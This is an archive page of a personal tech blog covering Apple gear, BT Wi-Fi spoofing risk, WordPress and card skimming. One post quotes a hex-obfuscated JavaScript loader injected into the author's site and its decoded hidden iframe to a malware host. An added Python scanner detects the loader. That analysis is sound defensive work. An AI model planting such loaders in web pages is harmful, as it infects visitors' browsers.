Archive for the ‘Technical’ Category

Magic Mouse Misbehaving?

25 Feb 2012 10:01 by Rick

Is your Apple Magic Mouse behaving strangely? Mine was juddery sideways and wouldn’t move vertically at all, though the scroll was ok. I tried switching it off, back on and reconnecting but that made no difference. The fix was rather surprising. Pick it up and gently but firmly thump it back down onto the desk. Considering that the only mechanical part is the click button this is a bit odd. We call it in the trade “The drop test” and it often works because it can reseat or jiggle connectors and socketed chips but I can’t see that that applies here. Anyway, try it and see.

BT Wi-Fi users beware

1 Nov 2011 14:34 by Rick

The BT broadband offering has a popular feature which allows you to access the internet from your mobile devices even when away from home. When everyone installs their Wi-Fi routers the process simultaneously sets up another Wi-Fi SSID called “BT Fon” (or sometimes “BT Openzone”, and I have seen both at once). With agreement (I think) these are configured so any BT user can sign in to them using their home account details and gain access to the internet via your connection. For privacy, identity and accounting this is kept entirely separate from the home owner’s connection and the only cost to them is a possible bandwidth reduction caused by the extra load. In practice this is a small price to pay for the ability of friends and relations to gain internet access without knowing your security code. You may get a few passers by briefly tapping your connection but they are not going to do it persistently because they have to be BT broadband customers themselves which they are paying for. It may be more of a problem if you live next to a park or café but not too serious.

This all sounds good—you are providing a service for others and in return they provide a service to you when you need it. There are millions of customers and hence millions of potential free Wi-Fi hotspots for you to use. There is security, in the form of an account and password, to verify identity which protects BT’s and the home owner’s interests.

What there is not is any security to protect the mobile user. The catch is that the Wi-Fi hot spot is only identified by its name (“BT Fon” or “BT Openzone”)—but anyone can create an SSID called that! So you don’t know if you are connecting to a real BT service or a fake one. This is true with any Wi-Fi hotspot of course, but much more insidious for these because of their ubiquity. There is a sign on process the first time you use one (and even that can be faked) but it is not required for subsequent connections as it is done automatically. For smart phone users it is potentially even more serious. As is pointed out in this Guardian article from April, phones sometimes connect even while in your pocket. O2 iPhones are configured to do this by default because of a partnership between O2 and BT.

BT have known about this problem for some time but have so far declined to do anything about it or even let anyone know. This is disappointing considering that their security team is one of the most respected in the industry.

Eternal Flame

6 Oct 2011 16:03 by Rick

Eternal Flame. Thanks to XKCD.

“PHP Fatal error: Call to undefined function get_header()” error in WordPress

25 Sep 2011 17:27 by Rick

I am getting occasional (3-4 a month) errors in a log file on the various WordPress installations that I support. The full text is

[25-Sep-2011 09:02:01] PHP Fatal error: Call to undefined function get_header() in /home/<ACCOUNT>/public_html/wp-content/themes/<THEME NAME>/index.php on line 1

Doing the natural thing I Googled for a reason but didn’t find much that was informative. Most of the cases reported were where the user had stupidly inadvertently overwritten the root index.php with the one from their theme of the day. The best I found was ardemis who is one step ahead of me.

As he implies, an important step is to stop the message reaching the user’s browser because it reveals rather too much about your web server. This is done by including the call

ini_set('display_errors', 0);

before the get_header();. This makes the message ONLY appear in the log file, which, incidentally, can be found in the theme directory. He then goes on to describe a more sophisticated approach which you can read there if it suits your site. But why are they occurring? Is it search engine spiders or hackers probing the depths of your site?

Arguments for and against installing MacOS Lion

22 Aug 2011 09:45 by Rick

I had trouble identifying any compelling reason to install the latest version of the Apple Mac OS version nicknamed “Lion” so resorted to reading all the reviews and listing the points. It may come down to going to a store and trying it out.

Pro

Stuff that is likely to work and I would actually use.

  • The usual security and currency stuff.
  • Creation of instant folders for selected content.
  • Filevault2 encryption.
  • Mission Control (Exposé + Spaces).
  • Accented character picker.
  • Resize windows from any corner.
  • Enhancements to Preview application.
  • Signatures to PDFs (if it works with third party cameras).
  • It is cheap.

Neutral

Either things I am not interested in or don’t have the hardware to support.

  • Full-screen applications now integrated and standard. With large monitors full-screen is often a waste of space.
  • Icons are now monochrome. Probably harder to see but no big deal.
  • Launchpad—I put the Applications folder on the Dock.
  • Autosave and version control (some applications). I am not sure about this one, I don’t think I use any applications that support it.
  • Added 9 Sept: Autosave and version control only work to HFS+ formatted drives, not NAS.
  • Resume (some) applications where you left off.
  • Multi-touch gestures (I have no touch pad—should I get one?).
  • AirDrop (Mac Pro has no built in wi-fi so it won’t work).
  • Reversal of scrolling. I’ll get used to it.
  • Facetime (reported no support for third party cameras).
  • Some gestures not supported on magic mouse.
  • (Reported) side swipes are inconsistent.
  • Loss of Rosetta. I never used it.
  • Mail and Calendar enhancements (I don’t use them).
  • Added 9 Sept: Loss of Front Row (thanks Dozer).

Con

Stuff that will hinder me.

  • Loss of grid arrangement of spaces (now desktops). I race around spaces at speed using Ctrl-Arrows.
  • Desktops don’t wrap around end to start as you cycle through them.
  • Desktops are not identifiable except by content.
  • Going full screen creates a new desktop in the list.
  • Inconsistencies with dual monitor support such as full screen.
  • (Reported) difficulty using copy/paste between desktops.
  • Auto-termination of applications which are not being used.
  • Wake on mouse “wiggle” disabled (not sure if this is just for system sleep or monitor sleep as well).
  • Added 9 Sept: Loss of connection to some NAS devices (thanks Dozer). I am informed by Netgear that my ReadyNAS duo should be ok. Not sure about my LinkSys NSLU2.

At the moment the big blocker is that a critical application has not yet been ported but that should be ready in a few weeks finding the time. Then…is it worth it?

Confused by Apple ID

6 Jul 2011 13:25 by Rick

To operate Apple equipment effectively you need an Apple ID—but the whole process is very confusing. You can log in to your account in at least three places:—

They all require the same id and password but each one gives you different information and there doesn’t seem to be any way to manage the account from one place or even to move from one to the other.

But I am also confused about the concept. Are we expected to have one ID (account) each or one per family? If the former then I can’t see how we can take advantage of the offer on the app store to purchase things once and install them on multiple devices. We were better off under the old family-pack idea. What happens if some of the machines (e.g. an iMac) have multiple users who also have personal devices?

If, on the other hand, we are expected to have one per family then what happens when the kids move out (or more extreme cases like divorce)—how can they take their music and apps with them?

What if you buy/inherit second hand equipment; can you transfer the registration? And what happens if you inherit music/apps—after all they would be regarded as an asset on the estate? Or if you marry? I am reading that Apple will not merge accounts.

Does any of this really matter?

Update: 10 August. Some notice is being taken of this problem. A new development is that an Apple ID can only be associated with 10 devices (including computers) at any one time and there must be a 90 day moratorium between switching of Apple IDs on any device.

Update: 8 Sept. Another well thought through commentary.

Hacked Again

16 Jun 2011 10:01 by Rick

Since the problem in 2007 my web sites have been running pretty smoothly. I never did get to the bottom of what caused it but the suspicion was an out of date WordPress install which had some sort of vulnerability.

This month it happened again. I first spotted it on 6 Jun when I saw a big iFrame appear below the page footer of this blog. Again there was a suspicion of a down-level WordPress but it was only one dot point off current. Nevertheless, I updated and the problem went away by wiping out the infected files. In fact, I did it so fast that I didn’t have time to investigate fully.

A week later, the problem was back and now, because I was fully up to date, I had to look more closely.

The code inserted was

[script]var t="";var arr="...";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);[/script]

which decodes to execute

document.write('[iframe src="http://esformofset.com/forum/php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"][/iframe]')

The hacked code was tacked on the end of module wp-blog-header.php so it is clear that the infection understands WordPress. Later I was informed by a regular visitor that some other (static) pages on the site were also infected. One drawback of running a browser with full protection like Firefox with NoScript is that you can’t easily spot things like this when they occur. Anyway, I spent an hour yesterday evening clearing up the rest of the site. It had infected almost all files called index.htm and home.htm and one or two others with a high page rank due to a lot of external referrers. The inserted code was after <body> and was either identical or very similar to the above (just a change of target web page).

So it is clear that the infection mechanism is clever, I just wish I knew what it was. I am no longer convinced that it is anything to do with WordPress – a ZeroDay vulnerability like this would have been reported by now and, at the time of writing, I can find no other internet reference to this particular infection. There is no other active content on the site so that leaves the possibility of either a cracked password (all of which are strong and recently changed) or a compromised host server.
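As an added example (not code from the original post), the following Python script scans a site tree for the loader shape quoted above and decodes its hex payload without executing it, reporting the iframe URL each infected file would inject. The sample files and the loader.example.invalid URL are constructed for the demonstration, and the regular expressions assume the loader keeps the var arr="…", parseInt(…,16) and eval structure shown in the post.

```python
import os
import re
import tempfile

# Loader shape quoted in the post: hex string in `arr`, decoded two characters
# at a time with parseInt(..., 16), then passed to eval().
LOADER_RE = re.compile(
    r'var\s+arr\s*=\s*"([0-9A-Fa-f]+)".{0,200}?parseInt\(.{0,40}?,\s*16\s*\).{0,80}?eval\(',
    re.DOTALL)
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']([^"\']+)', re.I)


def decode_loaders(text):
    """Return each loader's decoded payload as text, without executing it."""
    blobs = (m.group(1) for m in LOADER_RE.finditer(text))
    # Truncate to an even length so a damaged blob still decodes.
    return [bytes.fromhex(b[:len(b) // 2 * 2]).decode("latin-1") for b in blobs]


def scan_tree(root, extensions=(".php", ".htm", ".html")):
    """Map each infected file under root to the iframe URLs its loader writes."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as handle:
                payloads = decode_loaders(handle.read())
            if payloads:
                findings[os.path.relpath(path, root)] = [
                    url for p in payloads for url in IFRAME_SRC_RE.findall(p)]
    return findings


def demo():
    """Scan a constructed site: two infected files and one clean one."""
    payload = ('document.write(\'<iframe src="http://loader.example.invalid/x?tp=0"'
               ' width="1" height="1" frameborder="0"></iframe>\')')
    loader = ('<script>var t="";var arr="%s";for(i=0;i<arr.length;i+=2)t+='
              'String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>'
              % payload.encode("latin-1").hex())
    samples = {"index.htm": "<body>" + loader + "<p>Home</p></body>",
               "wp-blog-header.php": "<?php // core file\n" + loader,
               "about.htm": "<body><p>Clean page</p></body>"}
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "w", encoding="latin-1") as f:
                f.write(body)
        return scan_tree(root)
```

Run scan_tree() against a local copy of the web root so that every file carrying the loader is listed before cleanup; demo() exercises it on the constructed files.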

Card Skimming

28 May 2011 07:59 by Rick

Yesterday I had my credit card skimmed in a luxury goods shop in Cabot Circus. Credit card skimming is the process used by dodgy waiters and the like to steal the details off your card for use on the black market. It is often done using a small device concealed in the palm of their hand which reads the mag stripe while walking back to the till. This scam is, in fact, dying out as there are much easier ways for the criminals to get numbers in bulk, but it is still used by small time crooks.

So, what happened in the shop? They had a skimmer attached to the front of the till – I should point out here that the action of the assistant was not criminal and, I will presume, that the retail chain is not either. But they are foolish. Their system requires the credit card number before it will print a receipt. The PDQ chip-and-pin terminal they use for payment is not connected to the till system, and for good reason. They have no legitimate reason to collect and store the credit card numbers. In fact, I can’t imagine what they do with them. If there is a query over the payment (if the card subsequently turns out to be stolen for instance) then the merchant account provider, the people who process the transaction, have all the information necessary to pursue the case.

Larger retailers like supermarkets do have their systems connected together. They are operating as their own merchant provider and communicate directly with the credit card companies but they are then required to meet much more stringent security requirements on their whole system.

So if you see this happening – complain. I only noticed because the mag stripe on my card is faulty (it “accidentally” got too close to a strong magnet) and they had to type the number in by hand. It is also worthwhile noting the three digit number on the back of your card and then covering it up with a sticker. That will hinder online fraud.

I will report back here if the managing director of the chain concerned replies.

NeoOffice is no longer free

20 Apr 2011 10:45 by Rick

NeoOffice is a fork of the well known office suite OpenOffice.org customised for Mac OS X. When it was created there was no Mac version of OpenOffice and even when I started three years ago, the Mac support for OpenOffice was very poor. There have always been licence anomalies between the two versions—OpenOffice is LGPL and requires a copyright assignment for contributions to the main code. NeoOffice were not prepared to do this so their code is licensed under full GPL and is not retrofitted.

Up until now, it has always been free at source with a recommendation/plea for donations to support the work, which I have done at least once. Now, since Version 3.2, the “donation” is mandatory—you can’t download the code unless you have donated at least $10US within the last year.

Times have changed—it now requires Mac OS X 10.5+ and Intel hardware which must kill off a sizeable proportion of their customer base. Also OpenOffice and now LibreOffice are much more capable. Finally, if you must pay for it, the iWorks components are much more affordable and also offer cross format capabilities.

How incompetent can a software company be

10 Feb 2011 09:15 by Rick

I mean, of course, Adobe. I have written before about the hoops you need to go through to get copies of their critical security upgrades for the Flash products. Now they have cut off one of the little ruses I used so that it is now no longer possible to download the upgrade for Internet Explorer. All you get is flashax.exe, which is self deleting as soon as you run it (how stupid is that) and only runs an “Adobe Installation Helper” which downloads and runs the real product. Not a lot of help if you are not connected to the internet at the time. One of my systems will not be upgraded this time around because it can’t due to a firewall—perhaps I should sue for consequent damage when it gets infected.

Now all this fiddling about would perhaps make sense if the product was hundreds of MB and a download needed to continue if interrupted. But it is 2.7MB and takes a few seconds to download and a few more to install. What we want is an upgrade that we can download and save to run later and one that does all situations in one go – not separate for IE and other browsers.

[12 Feb—they’ve fixed it now]
